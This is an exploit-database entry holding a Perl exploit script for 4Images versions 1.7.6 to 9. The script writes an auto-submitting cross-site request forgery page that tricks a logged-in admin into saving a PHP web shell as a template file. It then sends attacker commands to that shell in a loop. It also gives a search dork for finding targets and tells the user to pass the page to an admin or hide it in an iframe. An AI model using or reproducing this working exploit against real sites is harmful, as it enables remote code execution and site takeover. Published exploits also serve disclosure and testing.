4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection

EDB-ID:

18429

CVE:





Platform:

PHP

Date:

2012-01-30


#!/usr/bin/perl
########################################################################
# Title    : 4images 1.7.6 > 9 Csrf inject php code
# Author   : Or4nG.M4n
# Version  : 1.7.6 > 9
# Homepage : http://www.4homepages.de/
# Dork     : "Powered by 4images"
# video    : http://youtu.be/NYF_zC9hH54
# Thnks~#+----------------------------------+
#        |    xSs m4n   i-Hmx   h311c0d3    |.sp. abo.B4sil
#        |   HcJ Cyb3r ahwak20o0 sa^Dev!L   |.sp. r00ts3c
#        +----------------------------------+
#                       4images 1.7.6 > 9 Csrf inject php code
# vuln : template.php
use LWP::UserAgent;
use LWP::Simple;
system("cls");
print
"
+----------------------------------------+\n
| 4images 1.7.6 > 9 csrf inject php code |\n
|   Or4nG.M4n  : priv8te\@hotmail.com    |\n
+----------------------------------------+\n
Loading ...\n
";
sleep(3);
print "http://tragt & path #";
$h = <STDIN>;
chomp $h;
$html = '<form action="'.$h.'/admin/templates.php" name="csrf" method="post">
<input type="hidden" name="action" value="savetemplate">
<textarea name="content" cols="0" rows="0" >
<?php
$cmd = $_GET["cmd"];
print "\n__Code__\n";
@system($cmd);
print "\n__Code__\n";
?>
&lt;/textarea&gt;
<input type="hidden" name="template_file_name" value="inject.php">
<input type="hidden" name="template_folder" value="default">
<script>document.csrf.submit();</script>
</form>';
sleep(2);
print "Createing ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. \n";
sleep(2);
print "Now give csrf.htm to admin or useing iframe code\n";
sleep(1);
print "\n if you done hit any key to continue";
$continue = <>;
for($ops=0;$ops<15;$ops++)
{
print "
Command# ";
$execut =<STDIN>;
chomp($execut);
$ex = $h."/templates/default/inject.php?cmd=".$execut;
my $content = get $ex;
while($content =~ m{__Code__(.*?)__code__(.*)}g){
print "\n [+]Executing\n\n";
}
print  $content;
}
# The End